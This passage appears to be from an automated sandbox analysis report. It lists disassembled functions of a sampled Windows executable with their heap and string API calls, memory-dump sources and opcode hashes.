                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: cb013bcf31856442225263195520408daae33612b73d1e573c3ebc81e6bfcade
                          • Instruction ID: dc6b3cdcfc35e275ed014509d6716f45c29437744f5105a60949e66086c3dd98
                          • Opcode Fuzzy Hash: cb013bcf31856442225263195520408daae33612b73d1e573c3ebc81e6bfcade
                          • Instruction Fuzzy Hash: 1831EA723086288BD724DE7CF88096AFBE5FF9A760B204A2AF541DB6C1C7719C418394
                          Function 00516EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00516F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00516F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: 7289385caf8c34edd41d0665b2ec8399f2e142e0b9397176deecfd3dca116153
                          • Instruction ID: a2e50279e1e60999105c37f227e49df20d4970536150795efa945ff429b117fa
                          • Opcode Fuzzy Hash: 7289385caf8c34edd41d0665b2ec8399f2e142e0b9397176deecfd3dca116153
                          • Instruction Fuzzy Hash: 47215BB16106029BEB208B24DC94BB677A8FB45705F444878F946CB688F779E986C750
                          Function 00531570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 005315A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 005315D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531611
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531649
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 427a3753e7f30078e30f9fd090cd2584a9d018587b3bb6a0591fa15f6220f8c8
                          • Instruction ID: b1a1317483ef0f0327b0096bf145208cfb3dca47554e1c9ba5f9bce842e6e46b
                          • Opcode Fuzzy Hash: 427a3753e7f30078e30f9fd090cd2584a9d018587b3bb6a0591fa15f6220f8c8
                          • Instruction Fuzzy Hash: E021D774601B029BE735DF7AD459A17BBF5BF84700F04491DA496C7A40DB34E891CFA4
                          Function 00511530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000), ref: 0051162D
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000,?), ref: 0051164F
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000,?), ref: 00511671
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000,?), ref: 00511693
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511557
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511579
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b35e00cf45c11c1cada087ae8bd8c3b16775f4be8373c1b89f1d76197e79d954
                          • Instruction ID: b34e4ade227b945aff803356feb8a85a26b27ba9e3544d9fbb0923c48406439c
                          • Opcode Fuzzy Hash: b35e00cf45c11c1cada087ae8bd8c3b16775f4be8373c1b89f1d76197e79d954
                          • Instruction Fuzzy Hash: F731D474A01F029FE724DF3AC588996BBE5BF89700700492EA996C3B10DB34F891CF84
                          Function 00511610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 0051162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511671
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511693
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 9e5b0573bb3e78a29013a51e8078973ab825c32374f3fbed85c2ce1bb065785d
                          • Instruction ID: 11685318ce443b57c7d396ff52c2968d7a7389443031c11401db8eb8d1d0f25c
                          • Opcode Fuzzy Hash: 9e5b0573bb3e78a29013a51e8078973ab825c32374f3fbed85c2ce1bb065785d
                          • Instruction Fuzzy Hash: 36115E74A11B039BEB249F79D40C967BBF8BF45701708452DE586C3B40EB34E891CB98